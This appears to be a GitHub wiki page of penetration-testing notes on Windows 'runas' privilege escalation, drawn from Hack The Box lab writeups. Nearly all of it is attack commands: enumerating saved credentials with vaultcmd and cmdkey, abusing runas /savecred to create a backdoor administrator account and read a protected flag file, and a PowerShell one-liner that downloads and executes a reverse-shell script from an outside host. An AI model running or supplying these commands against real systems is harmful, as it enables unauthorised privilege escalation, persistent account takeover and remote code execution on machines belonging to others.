-
Notifications
You must be signed in to change notification settings - Fork 14
Runas attack
lethanhtung01011980 edited this page Apr 22, 2020
·
13 revisions
- Runas "admin" with saved admin password
- Already had normal user
- No SYSTEM yet
- Ref: https://snowscan.io/htb-writeup-access/#
- List saved vaults:
vaultcmd /list
- List saved creds in saved vaults:
vaultcmd /listcreds:"Windows Vault"
=> Check if having Administrator in saved creds - All stored credentials (even to remote machines):
cmdkey /list
Runas
- Run as admin:
runas /user:administrator /savecred c:\Users\security\shell.bat
runas /user:ACCESS\Administrator /savecred "net user /add manolo Caca123"
runas /user:ACCESS\Administrator /savecred "net localgroup administrators manolo /add"
runas /user:ACCESS\Administrator /savecred "net localgroup TelnetClients manolo /add"
runas /user:ACCESS\Administrator /savecred "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\temp\caca"
- https://thecyberjedi.com/chatterbox/
- Using powershell, store the credentials in $creds for the session
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;$creds = New-Object System.Management.Automation.PSCredential('administrator' $passwd)
- A reverse shell can now be opened with the supplied credentials using the command
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.14/Invoke-PowerShellTcp.ps1')" -Credential $creds